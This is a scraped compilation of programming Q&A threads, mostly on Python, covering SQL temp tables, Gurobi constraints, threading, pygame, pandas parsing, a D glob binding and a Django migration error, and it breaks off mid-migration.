SELECT d.id, d.model_id, d.date_created
FROM design d
INNER JOIN input i ON d.id = i.design_id
INNER JOIN parameters p ON p.id = i.parameter_id
WHERE p.name IN ('param1', 'param2', 'param3', 'param4', 'param5', ...)
**Inner Join with Temp Table**
Should values be over 100+ in a long list, consider a temp table that filters
_parameters_ table to specific parameter values:
# CREATE EMPTY TABLE (SAME STRUCTURE AS parameters)
sql = "CREATE TABLE tempparams AS SELECT id, name, units FROM parameters WHERE 0;"
cur.execute(sql)
db.commit()
# ITERATIVELY APPEND TO TEMP
for i in paramslist: # LIST OF 100+ ITEMS
sql = "INSERT INTO tempparams (id, name, units) \
SELECT p.id, p.name, p.units \
FROM parameters p \
WHERE p.name = ?;"
cur.execute(sql, i) # CURSOR OBJECT COMMAND PASSING PARAM
db.commit() # DB OBJECT COMMIT ACTION
Then, join main _design_ and _input_ tables with new temp table holding
specific parameters:
SELECT d.id, d.model_id, d.date_created
FROM design d
INNER JOIN input i ON d.id = i.design_id
INNER JOIN tempparams t ON t.id = i.parameter_id
Same process can work with _components_ table as well.
*Moved picture to question section
|
Improve performance of constraint-adding in Gurobi (Python-Interface)
Question: i got this decision variable:
x={}
for j in range(10):
for i in range(500000):
x[i,j] = m.addVar(vtype=GRB.BINARY, name="x%d%d" %(i,j))
so i need to add constraints for each x[i,j] variable like this:
for p in range(10):
for u in range(500000):
m.addConstr(x[u,p-1]<=x[u,p])
this is taking me so much time, more that 12hrs and then a lack of memory pop-
up appears at my computer. Can someone helpme to improve this constraint
addition problem
Answer: ## General Remark:
* It looks quite costly to add 5 million constraints in general
## Specific Remark:
### Approach
* You are wasting time and space by using _dictionaries_
* Despite having constant-access complexity, these constants are big
* They are also wasting memory
* In a simple 2-dimensional case like this: stick to arrays!
### Validity
* Your indexing is missing the border-case of the first element, so indexing breaks!
Try this (much more efficient approach; using numpy's arrays):
import numpy as np
from gurobipy import *
N = 10
M = 500000
m = Model("Testmodel")
x = np.empty((N, M), dtype=object)
for i in range(N):
for j in range(M):
x[i,j] = m.addVar(vtype=GRB.BINARY, name="x%d%d" %(i,j))
m.update()
for u in range(M): # i switched the loop-order
for p in range(1,N): # i'm handling the border-case
m.addConstr(x[p-1,u] <= x[p,u])
**Result:**
* _~2 minutes_
* _~2.5GB_ memory (complete program incl. Gurobi's internals)
|
How to sum Threads in python
Question: I need help on how i can sum all the threads.to get sum of thread one to three
all together..The parallel program should use all processors in host computer
import threading
import time
from datetime import datetime
start_time = datetime.now()
def sum_number():
summ = 100
for num in range (1, 100):
summ = summ + num
num -= 1
print ("SUM IS", summ)
def sum_number1():
summr = 200
for num in range (101,200):
summr = summr + num
num -= 1
print ("SUM IS", summr)
def sum_number2():
summy = 300
for num in range (201, 300):
summy = summy + num
num -= 1
print ("SUM IS", summy)
#take time t2
#end_time =datetime.now()
#print t2 -t1
#print('Time taken : {}'. format(end_time-start_time))
if __name__=="__main__":
#sum_number()
#sum_number1()
#sum_number2()
#sum_number3()
t1=threading.Thread(target=sum_number)
t1.start()
time.sleep(5)
t2=threading.Thread(target=sum_number1)
t2.start()
time.sleep(10)
t3=threading.Thread(target=sum_number2)
t3.start()
time.sleep(15)
#end_time =datetime.now()
I need help on how i can sum all the threads.to get sum of thread one to three
all together..The parallel program should use all processors in host computer
Answer: You can do
import time
import multiprocessing.dummy as mp # uses threads instead of full processes
def sum_range(start_stop):
start,stop=start_stop
return sum(range(start,stop))
if __name__=="__main__":
start_time=time.perf_counter()
with mp.Pool() as p:
my_sums=p.map(sum_range,[(1,101),(101,201),(201,301)]) # sums from 1 to 300 (including 300)
full_sum=sum(my_sums)
end_time=time.perf_counter()
print("The sum is", full_sum)
print("Calculating it took",end_time-start_time, "seconds." )
for using processes instead of threads use `import multiprocessing as mp`
In this case if you are after performance, doing the sum in a single
thread/process is much faster because you are summing so few numbers. Creating
Threads takes time and creating Processes takes much more time. (Normally
using threads does not increase computational performance with the standard
interpreter if you are not using special functions which release the "GIL")
|
Sign extending from a variable bit width
Question: Here is a code in C++:
#include <iostream>
#include<limits.h>
using namespace std;
void sign_extending(int x,unsigned b)
{
int r; // resulting sign-extended number
int const m = CHAR_BIT * sizeof(x) - b;
r = (x << m) >> m;
cout << r;
}
void Run()
{
unsigned b = 5; // number of bits representing the number in x
int x = 29; // sign extend this b-bit number to r
sign_extending(x,b);
}
> Result : -3
The resulting number will be a signed number with its number of bits stored in
b. I am trying to replicate this code in python :
from ctypes import *
import os
def sign_extending(x, b):
m = c_int(os.sysconf('SC_CHAR_BIT') * sizeof(c_int(x)) - b)
r = c_int((x << m.value) >> m.value) # Resulting sign-extended number
return r.value
b = c_int(5) # number of bits representing the number in x
x = c_int(29) # sign extend this b-bit number to r
r = sign_extending(x.value, b.value)
print r
> Result : 29
I cannot get the sign extended number just like from the output in c++. I
would like to know the error or problems in my current code(python) and also a
possible solution to the issue using this technique.
Answer: you can use
def sign_extending(x, b):
if x&(1<<(b-1)): # is the highest bit (sign) set? (x>>(b-1)) would be faster
return x-(1<<b) # 2s complement
return x
|
Why is my blitted characted not moving in pygame?
Question: I am making an RPG in Python using Pygame. My first step is to create my main
character and let it move. But it isn't. This is my code:
import pygame,random
from pygame.locals import *
pygame.init()
black = (0,0,0)
white = (255,255,255)
red = (255,0,0)
blue = (0,255,0)
green = (0,0,255)
global screen, size, winWidth, winHeight, gameExit, pressed, mainChar, x, y
size = winWidth,winHeight = (1350,668)
screen = pygame.display.set_mode(size)
pygame.display.set_caption("RPG")
gameExit = False
pressed = pygame.key.get_pressed()
mainChar = pygame.image.load("Main Character.png")
x,y = 655,500
def surroundings():
stoneTile = pygame.image.load("Stone Tile.png")
stoneTileSize = stoneTile.get_rect()
def move():
if pressed[K_LEFT]: x -= 1
if pressed[K_RIGHT]: x += 1
if pressed[K_UP]: y -= 1
if pressed[K_DOWN]: y += 1
def player():
move()
screen.fill(black)
screen.blit(mainChar,(x,y))
while not gameExit:
for event in pygame.event.get():
if event.type == QUIT:
gameExit = True
surroundings()
move()
player()
pygame.display.update()
pygame.quit()
quit()
Please help me and explain why it isn't working, too. Thanks.
Answer: You will have to update your pressed variable in each run
while not gameExit:
for event in pygame.event.get():
if event.type == QUIT:
gameExit = True
pressed = pygame.key.get_pressed()
surroundings()
move()
player()
pygame.display.update()
The values x and y that you have used within that move function are being
treated as a local variable you will have to tell the interpreter that they
are global variables
def move():
global x,y
if pressed[K_LEFT]: x -= 1
if pressed[K_RIGHT]: x += 1
if pressed[K_UP]: y -= 1
if pressed[K_DOWN]: y += 1
|
Rosalind Profile and Consensus: Writing long strings to one line in Python (Formatting)
Question: I'm trying to tackle a problem on Rosalind where, given a FASTA file of at
most 10 sequences at 1kb, I need to give the consensus sequence and profile
(how many of each base do all the sequences have in common at each
nucleotide). In the context of formatting my response, what I have as my code
works for small sequences (verified).
However, I have issues in formatting my response when it comes to large
sequences. What I expect to return, regardless of length, is:
"consensus sequence"
"A: one line string of numbers without commas"
"C: one line string """" "
"G: one line string """" "
"T: one line string """" "
All aligned with each other and on their own respective lines, or at least
some formatting that allows me to carry this formatting as a unit onward to
maintain the integrity of aligning.
but when I run my code for a large sequence, I get each separate string below
the consensus sequence broken up by a newline, presumably because the string
itself is too long. I've been struggling to think of ways to circumvent the
issue, but my searches have been fruitless. I'm thinking about some iterative
writing algorithm that can just write the entirety of the above expectation
but in chunks Any help would be greatly appreciated. I have attached the
entirety of my code below for the sake of completeness, with block comments as
needed, though the main section.
def cons(file):
#returns consensus sequence and profile of a FASTA file
import os
path = os.path.abspath(os.path.expanduser(file))
with open(path,"r") as D:
F=D.readlines()
#initialize list of sequences, list of all strings, and a temporary storage
#list, respectively
SEQS=[]
mystrings=[]
temp_seq=[]
#get a list of strings from the file, stripping the newline character
for x in F:
mystrings.append(x.strip("\n"))
#if the string in question is a nucleotide sequence (without ">")
#i'll store that string into a temporary variable until I run into a string
#with a ">", in which case I'll join all the strings in my temporary
#sequence list and append to my list of sequences SEQS
for i in range(1,len(mystrings)):
if ">" not in mystrings[i]:
temp_seq.append(mystrings[i])
else:
SEQS.append(("").join(temp_seq))
temp_seq=[]
SEQS.append(("").join(temp_seq))
#set up list of nucleotide counts for A,C,G and T, in that order
ACGT= [[0 for i in range(0,len(SEQS[0]))],
[0 for i in range(0,len(SEQS[0]))],
[0 for i in range(0,len(SEQS[0]))],
[0 for i in range(0,len(SEQS[0]))]]
#assumed to be equal length sequences. Counting amount of shared nucleotides
#in each column
for i in range(0,len(SEQS[0])-1):
for j in range(0, len(SEQS)):
if SEQS[j][i]=="A":
ACGT[0][i]+=1
elif SEQS[j][i]=="C":
ACGT[1][i]+=1
elif SEQS[j][i]=="G":
ACGT[2][i]+=1
elif SEQS[j][i]=="T":
ACGT[3][i]+=1
ancstr=""
TR_ACGT=list(zip(*ACGT))
acgt=["A: ","C: ","G: ","T: "]
for i in range(0,len(TR_ACGT)-1):
comp=TR_ACGT[i]
if comp.index(max(comp))==0:
ancstr+=("A")
elif comp.index(max(comp))==1:
ancstr+=("C")
elif comp.index(max(comp))==2:
ancstr+=("G")
elif comp.index(max(comp))==3:
ancstr+=("T")
'''
writing to file... trying to get it to write as
consensus sequence
A: blah(1line)
C: blah(1line)
G: blah(1line)
T: blah(line)
which works for small sequences. but for larger sequences
python keeps adding newlines if the string in question is very long...
'''
myfile="myconsensus.txt"
writing_strings=[acgt[i]+' '.join(str(n) for n in ACGT[i] for i in range(0,len(ACGT))) for i in range(0,len(acgt))]
with open(myfile,'w') as D:
D.writelines(ancstr)
D.writelines("\n")
for i in range(0,len(writing_strings)):
D.writelines(writing_strings[i])
D.writelines("\n")
cons("rosalind_cons.txt")
Answer: Your code is totally fine except for this line:
writing_strings=[acgt[i]+' '.join(str(n) for n in ACGT[i] for i in range(0,len(ACGT))) for i in range(0,len(acgt))]
You accidentally replicate your data. Try replacing it with:
writing_strings=[ACGT[i] + str(ACGT[i]) for i in range(0,len(ACGT))]
and then write it to your output file as follows:
D.write(writing_strings[i][1:-1])
That's a lazy way to get rid of the brackets from your list.
|
Make console-friendly string a useable pandas dataframe python
Question: A quick question as I'm currently changing from R to pandas for some projects:
I get the following print output from `metrics.classification_report` from
`sci-kit learn`:
precision recall f1-score support
0 0.67 0.67 0.67 3
1 0.50 1.00 0.67 1
2 1.00 0.80 0.89 5
avg / total 0.83 0.78 0.79 9
I want to use this (and similar ones) as a matrix/dataframe so, that I could
subset it to extract, say the precision of class 0.
In R, I'd give the first "column" a name like 'outcome_class' and then subset
it: `my_dataframe[my_dataframe$class_outcome == 1, 'precision']`
And I can do this in pandas but the `dataframe` that I want to use is simply a
string [see sckikit's doc](http://scikit-
learn.org/stable/modules/generated/sklearn.metrics.classification_report.html)
How can I make the table output here to a useable dataframe in pandas?
Answer: Assign it to a variable, `s`:
s = classification_report(y_true, y_pred, target_names=target_names)
Or directly:
s = '''
precision recall f1-score support
class 0 0.50 1.00 0.67 1
class 1 0.00 0.00 0.00 1
class 2 1.00 0.67 0.80 3
avg / total 0.70 0.60 0.61 5
'''
Use that as the string input for StringIO:
import io # For Python 2.x use import StringIO
df = pd.read_table(io.StringIO(s), sep='\s{2,}') # For Python 2.x use StringIO.StringIO(s)
df
Out:
precision recall f1-score support
class 0 0.5 1.00 0.67 1
class 1 0.0 0.00 0.00 1
class 2 1.0 0.67 0.80 3
avg / total 0.7 0.60 0.61 5
Now you can slice it like an R data.frame:
df.loc['class 2']['f1-score']
Out: 0.80000000000000004
Here, classes are the index of the DataFrame. You can use `reset_index()` if
you want to use it as a regular column:
df = df.reset_index().rename(columns={'index': 'outcome_class'})
df.loc[df['outcome_class']=='class 1', 'support']
Out:
1 1
Name: support, dtype: int64
|
Is there an equivalent for Glob in D Phobos?
Question: In python I can use glob to search path patterns. This for instance:
import glob
for entry in glob.glob("/usr/*/python*"):
print(entry)
Would print this:
/usr/share/python3
/usr/share/python3-plainbox
/usr/share/python
/usr/share/python-apt
/usr/include/python3.5m
/usr/bin/python3
/usr/bin/python3m
/usr/bin/python2.7
/usr/bin/python
/usr/bin/python3.5
/usr/bin/python3.5m
/usr/bin/python2
/usr/lib/python3
/usr/lib/python2.7
/usr/lib/python3.5
How would I `glob` or make a glob equivalent in in D?
Answer: If you only work on a Posix system, you can directly call `glob.h`. Here's a
simple example that shows how easy it is to interface with the Posix API:
void main()
{
import std.stdio;
import glob : glob;
foreach(entry; glob("/usr/*/python*"))
writeln(entry);
}
You can compile this e.g. with `rdmd main.d` (rdmd does simple dependency
management) or `dmd main.d glob.d` and it yields a similar output as yours on
my machine.
`glob.d` was generated by [dstep](https://github.com/jacob-carlborg/dstep) and
is enhanced with a convenience D-style wrapper (first function). Please note
that this isn't perfect and a better way would be to expose a range API
instead of allocating the entire array.
/* Copyright (C) 1991-2016 Free Software Foundation, Inc.
This file is part of the GNU C Library.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<http://www.gnu.org/licenses/>. */
string[] glob(string pattern)
{
import std.string;
string[] results;
glob_t glob_result;
glob(pattern.toStringz, 0, null, &glob_result);
for (uint i = 0; i < glob_result.gl_pathc; i++)
{
results ~= glob_result.gl_pathv[i].fromStringz().idup;
}
globfree(&glob_result);
return results;
}
import core.stdc.config;
extern (C):
enum _GLOB_H = 1;
/* We need `size_t' for the following definitions. */
alias c_ulong __size_t;
alias c_ulong size_t;
/* The GNU CC stddef.h version defines __size_t as empty. We need a real
definition. */
/* Bits set in the FLAGS argument to `glob'. */
enum GLOB_ERR = 1 << 0; /* Return on read errors. */
enum GLOB_MARK = 1 << 1; /* Append a slash to each name. */
enum GLOB_NOSORT = 1 << 2; /* Don't sort the names. */
enum GLOB_DOOFFS = 1 << 3; /* Insert PGLOB->gl_offs NULLs. */
enum GLOB_NOCHECK = 1 << 4; /* If nothing matches, return the pattern. */
enum GLOB_APPEND = 1 << 5; /* Append to results of a previous call. */
enum GLOB_NOESCAPE = 1 << 6; /* Backslashes don't quote metacharacters. */
enum GLOB_PERIOD = 1 << 7; /* Leading `.' can be matched by metachars. */
enum GLOB_MAGCHAR = 1 << 8; /* Set in gl_flags if any metachars seen. */
enum GLOB_ALTDIRFUNC = 1 << 9; /* Use gl_opendir et al functions. */
enum GLOB_BRACE = 1 << 10; /* Expand "{a,b}" to "a" "b". */
enum GLOB_NOMAGIC = 1 << 11; /* If no magic chars, return the pattern. */
enum GLOB_TILDE = 1 << 12; /* Expand ~user and ~ to home directories. */
enum GLOB_ONLYDIR = 1 << 13; /* Match only directories. */
enum GLOB_TILDE_CHECK = 1 << 14; /* Like GLOB_TILDE but return an error
if the user name is not available. */
enum __GLOB_FLAGS = GLOB_ERR | GLOB_MARK | GLOB_NOSORT | GLOB_DOOFFS | GLOB_NOESCAPE | GLOB_NOCHECK | GLOB_APPEND | GLOB_PERIOD | GLOB_ALTDIRFUNC | GLOB_BRACE | GLOB_NOMAGIC | GLOB_TILDE | GLOB_ONLYDIR | GLOB_TILDE_CHECK;
/* Error returns from `glob'. */
enum GLOB_NOSPACE = 1; /* Ran out of memory. */
enum GLOB_ABORTED = 2; /* Read error. */
enum GLOB_NOMATCH = 3; /* No matches found. */
enum GLOB_NOSYS = 4; /* Not implemented. */
/* Previous versions of this file defined GLOB_ABEND instead of
GLOB_ABORTED. Provide a compatibility definition here. */
/* Structure describing a globbing run. */
struct glob_t
{
__size_t gl_pathc; /* Count of paths matched by the pattern. */
char** gl_pathv; /* List of matched pathnames. */
__size_t gl_offs; /* Slots to reserve in `gl_pathv'. */
int gl_flags; /* Set to FLAGS, maybe | GLOB_MAGCHAR. */
/* If the GLOB_ALTDIRFUNC flag is set, the following functions
are used instead of the normal file access functions. */
void function (void*) gl_closedir;
void* function (void*) gl_readdir;
void* function (const(char)*) gl_opendir;
int function (const(char)*, void*) gl_lstat;
int function (const(char)*, void*) gl_stat;
}
/* If the GLOB_ALTDIRFUNC flag is set, the following functions
are used instead of the normal file access functions. */
/* Do glob searching for PATTERN, placing results in PGLOB.
The bits defined above may be set in FLAGS.
If a directory cannot be opened or read and ERRFUNC is not nil,
it is called with the pathname that caused the error, and the
`errno' value from the failing call; if it returns non-zero
`glob' returns GLOB_ABEND; if it returns zero, the error is ignored.
If memory cannot be allocated for PGLOB, GLOB_NOSPACE is returned.
Otherwise, `glob' returns zero. */
int glob (
const(char)* __pattern,
int __flags,
int function (const(char)*, int) __errfunc,
glob_t* __pglob);
/* Free storage allocated in PGLOB by a previous `glob' call. */
void globfree (glob_t* __pglob);
|
Cannot build master of Tensorflow Serving
Question: I've built Tensorflow from source, CUDA 8.0, python 3.5, Ubuntu 16.04,
targeting a NVIDIA 1070, and it works fine.
> Python 3.5.2 (default, Jul 5 2016, 12:43:10) [GCC 5.4.0 20160609] on linux
> Type "help", "copyright", "credits" or "license" for more information.
>
>> > > import tensorflow as tf I tensorflow/stream_executor/dso_loader.cc:108]
successfully opened CUDA library libcublas.so.8.0 locally I
tensorflow/stream_executor/dso_loader.cc:108] successfully opened CUDA library
libcudnn.so.5 locally I tensorflow/stream_executor/dso_loader.cc:108]
successfully opened CUDA library libcufft.so.8.0 locally I
tensorflow/stream_executor/dso_loader.cc:108] successfully opened CUDA library
libcuda.so.1 locally I tensorflow/stream_executor/dso_loader.cc:108]
successfully opened CUDA library libcurand.so.8.0 locally
However, when attempting to build tensorflow_serving from source, it always
fails as such:
> Blockquote File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/tf_serving/../org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.py",
> line 115, in tf.app.run() File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/org_tensorflow/tensorflow/python/platform/app.py",
> line 30, in run sys.exit(main(sys.argv)) File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/tf_serving/../org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.py",
> line 111, in main Export() File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/tf_serving/../org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.py",
> line 106, in Export assets_callback=CopyAssets) File
> "/home/alitz/.cache/bazel/_bazel_alitz/7318bb8e61ee048c2d10c9f8fb67c783/execroot/serving/bazel-
> out/host/bin/external/org_tensorflow/tensorflow/contrib/session_bundle/example/export_half_plus_two.runfiles/org_tensorflow/tensorflow/contrib/session_bundle/exporter.py",
> line 202, in init graph_any_buf.Pack(copy) AttributeError: 'Any' object has
> no attribute 'Pack' Blockquote
Any help would be greatly appreciated, or I will quit my job and go work
construction.
Thanks.
Answer: Though I built protobuf from source, apparently this wasn't enough.
Steps to fix:
sudo pip uninstall protobuf
sudo pip install --upgrade protobuf==3.0.0b2
This version, and only this version, seems to work with the master for
tensorflow_serving, at least for me.
|
regarding the parameters in os.path.join
Question: I am trying to reproduce a python program, which includes the following line
of code
data = glob(os.path.join("./data", config.dataset, "*.jpg"))
My guess is that it will capture all `.jpg` files stored in `/data` folder.
But I am not sure the usage of `config.dataset` here? Should the folder
structure look like `/data/config.dataset/*.jpg` The reason I need to
understand this is because I need to create a data input folder to run the
program. The original program does not share the detail on the data
organization.
Answer: `config.dataset` in your code fragment is a variable. It's either a `dataset`
attribute of some `config` object, or the `dataset` global variable in an
imported `config` module (from this code's perspective they work the same).
As a few people have commented, for that code to work, `config.dataset` must
evaluate to a string, probably a single directory name. So the result of the
`join` call will be something like `"./data/images/*.jpg"` (if
`config.dataset` is `"images"`). The variable could also have a (pre-joined)
path section including one or more slashes. For instance, if `config.dataset`
was `"path/to/the/images"`, you'd end up with
`"./data/path/to/the/images/*.jpg"`.
|
How to call methods inside a class?
Question: I have a test Python class named calc with two methods `add` and `sub`. How
can I run the methods from the python prompt? I am at the python command line
">>>" and typing `import calc`. Then I type `calc.add(5,3)` and get "No module
named 'calc'". File name is `calc.py`.
class calc:
def add(x,y):
answer = x + y
print(answer)
def sub(x,y):
answer = x - y
print(answer)
Answer: `calc` is the module name _and_ a class in the module. Use `import calc` and
then refer to the class with `calc.calc`:
`calc.py`:
class calc:
def add(self, x, y): # note the use of "self"
answer = x + y
print(answer)
def sub(self, x, y):
answer = x - y
print(answer)
Test script:
import calc
c = calc.calc()
c.add(5, 3)
Several modules in the standard library exhibit this naming scheme, such as
`pprint`, `time`, and `datetime`.
|
Locating a graphic function (Python)
Question: First off, thanks to the site and everybody on it. I am taking my first python
class and have come across this site many times when trouble-shooting coding
problems. Thanks to everybody who have already helped me out a little thus
far. But, I do have a problem I can't figure out:
I have to draw the "5" side of a die in a python graphics window. The catch is
that I can't just draw them. My "Dot" function has to be called 5 times to
complete the graphic. I had trouble with the dot being placed on the
rectangle, but the prof helped me out there. I just can't seem to locate the
same dot in different locations. Here is my code so far:
from graphics import*
def Dot(win):
# Draw a dot
center=Point(150,150)
circ=Circle(center,25)
circ.setFill('Black')
circ.draw(win)
def Dice():
#Build the dice (fill white, background green)
win=GraphWin('Shapes',500,500)
win.setBackground('Green')
rect=Rectangle(Point(100,100),Point(400,400))
rect.setFill('White')
rect.draw(win)
#Call dot 5 times with different locations:
Dot(win)
Dot(win)
Dot(win)
Dot(win)
Dot(win)
def main():
Dice()
main()
I have to call the "Dot" function 5 times. However, I have tried to
".move(pt,pt), .locate, etc. I can't figure out how to take the "Dot" function
and move it to a different location on the graphics window. Any help would be
greatly appreciated.
Thanks.
Answer: I was finally able to get this one. I wasn't aware you could command after the
window arguement. So, the Dot(win, 350,150) etc. with the different
coordinates worked well. Thanks for the responses and help!
|
Custom User Model ValueError: Related Model Django(1.9)
Question: There is an error when I try to add CustomUser model as ForiegnKey to a field
in django. The authentication is working using the CustomUser model but for
some reason I have getting this error:
ValueError: Related model 'authentication.UserModel' cannot be resolved
Here is the app/models.py:
from django.db import models
from django.conf import settings
class A(models.Model)
tender_authority = models.ForeignKey(settings.AUTH_USER_MODEL)
Here is the settings.py
AUTH_USER_MODEL = 'authentication.UserModel'
Here is the tree structure of the project:
myproject
settings.py
authentication
models.py ---> UserModel (my custom user model name) Model is present here
myapp
models.py ---> Error happening here
Thank you in advance.
Full Trace back, forgot to mention that this is happening while I am trying to
migrate:
Operations to perform:
Apply all migrations: auth, admin, authentication, contenttypes, sessions, Forms
Running migrations:
Rendering model states... DONE
Applying Forms.0010_tech_auth_Usermodel_to_User...Traceback (most recent call last):
File "manage.py", line 10, in <module>
execute_from_command_line(sys.argv)
File "/usr/local/lib/python3.5/dist-packages/django/core/management/__init__.py", line 353, in execute_from_command_line
utility.execute()
File "/usr/local/lib/python3.5/dist-packages/django/core/management/__init__.py", line 345, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/usr/local/lib/python3.5/dist-packages/django/core/management/base.py", line 348, in run_from_argv
self.execute(*args, **cmd_options)
File "/usr/local/lib/python3.5/dist-packages/django/core/management/base.py", line 399, in execute
output = self.handle(*args, **options)
File "/usr/local/lib/python3.5/dist-packages/django/core/management/commands/migrate.py", line 200, in handle
executor.migrate(targets, plan, fake=fake, fake_initial=fake_initial)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/executor.py", line 92, in migrate
self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/executor.py", line 121, in _migrate_all_forwards
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/executor.py", line 198, in apply_migration
state = migration.apply(state, schema_editor)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/migration.py", line 123, in apply
operation.database_forwards(self.app_label, schema_editor, old_state, project_state)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/operations/fields.py", line 201, in database_forwards
schema_editor.alter_field(from_model, from_field, to_field)
File "/usr/local/lib/python3.5/dist-packages/django/db/backends/base/schema.py", line 454, in alter_field
new_db_params = new_field.db_parameters(connection=self.connection)
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 967, in db_parameters
return {"type": self.db_type(connection), "check": []}
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 958, in db_type
rel_field = self.target_field
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 861, in target_field
return self.foreign_related_fields[0]
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 594, in foreign_related_fields
return tuple(rhs_field for lhs_field, rhs_field in self.related_fields if rhs_field)
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 581, in related_fields
self._related_fields = self.resolve_related_fields()
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 566, in resolve_related_fields
raise ValueError('Related model %r cannot be resolved' % self.remote_field.model)
ValueError: Related model 'authentication.UserModel' cannot be resolved
Migration:
'
class Migration(migrations.Migration):
dependencies = [
('Forms', '0009_revised_tender_changes'),
]
operations = [
migrations.AlterField(
model_name='agreementsanctionmodel',
name='bank_details_one',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.BankDetailsModel', verbose_name='Bank Details'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='contractor',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.Contractor', verbose_name='Contractor'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='contractor_name',
field=models.CharField(blank=True, max_length=250, verbose_name='Contractor'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='tender',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.Tender', verbose_name='Tender'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='tender_name',
field=models.CharField(blank=True, max_length=50, unique=True, verbose_name='Tender'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='updated_on',
field=models.DateField(blank=True, default=None, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='consultant',
name='districts',
field=models.CharField(max_length=50, null=True, verbose_name='District'),
),
migrations.AlterField(
model_name='consultant',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True, unique=True, verbose_name='Email ID'),
),
migrations.AlterField(
model_name='consultant',
name='first_name',
field=models.CharField(default=0, max_length=100, verbose_name='First Name'),
preserve_default=False,
),
migrations.AlterField(
model_name='consultant',
name='house_number',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Phone Number'),
),
migrations.AlterField(
model_name='consultant',
name='last_name',
field=models.CharField(max_length=100, verbose_name='Last Name'),
),
migrations.AlterField(
model_name='consultant',
name='middle_name',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Middle Name'),
),
migrations.AlterField(
model_name='consultant',
name='pan_number',
field=models.CharField(default=0, max_length=50, unique=True, verbose_name='PAN Number'),
preserve_default=False,
),
migrations.AlterField(
model_name='consultant',
name='state',
field=models.CharField(max_length=50, null=True, verbose_name='State'),
),
migrations.AlterField(
model_name='consultant',
name='street_name',
field=models.CharField(max_length=50, null=True, verbose_name='Street Name'),
),
migrations.AlterField(
model_name='consultant',
name='tin_number',
field=models.CharField(default=0, max_length=10, unique=True, verbose_name='TIN Number'),
preserve_default=False,
),
migrations.AlterField(
model_name='contractor',
name='districts',
field=models.CharField(max_length=50, null=True, verbose_name='District'),
),
migrations.AlterField(
model_name='contractor',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True, unique=True, verbose_name='Email ID'),
),
migrations.AlterField(
model_name='contractor',
name='first_name',
field=models.CharField(max_length=100, verbose_name='First Name'),
),
migrations.AlterField(
model_name='contractor',
name='house_number',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Phone Number'),
),
migrations.AlterField(
model_name='contractor',
name='last_name',
field=models.CharField(max_length=100, verbose_name='Last Name'),
),
migrations.AlterField(
model_name='contractor',
name='middle_name',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Middle Name'),
),
migrations.AlterField(
model_name='contractor',
name='state',
field=models.CharField(max_length=50, null=True, verbose_name='State'),
),
migrations.AlterField(
model_name='contractor',
name='street_name',
field=models.CharField(max_length=50, null=True, verbose_name='Street Name'),
),
migrations.AlterField(
model_name='locationmodel',
name='district',
field=models.CharField(max_length=50, verbose_name='District '),
),
migrations.AlterField(
model_name='locationmodel',
name='division',
field=models.CharField(max_length=50, verbose_name='Division '),
),
migrations.AlterField(
model_name='locationmodel',
name='location',
field=models.CharField(max_length=50, verbose_name='Location'),
),
migrations.AlterField(
model_name='locationmodel',
name='place',
field=models.CharField(max_length=50, verbose_name='Place '),
),
migrations.AlterField(
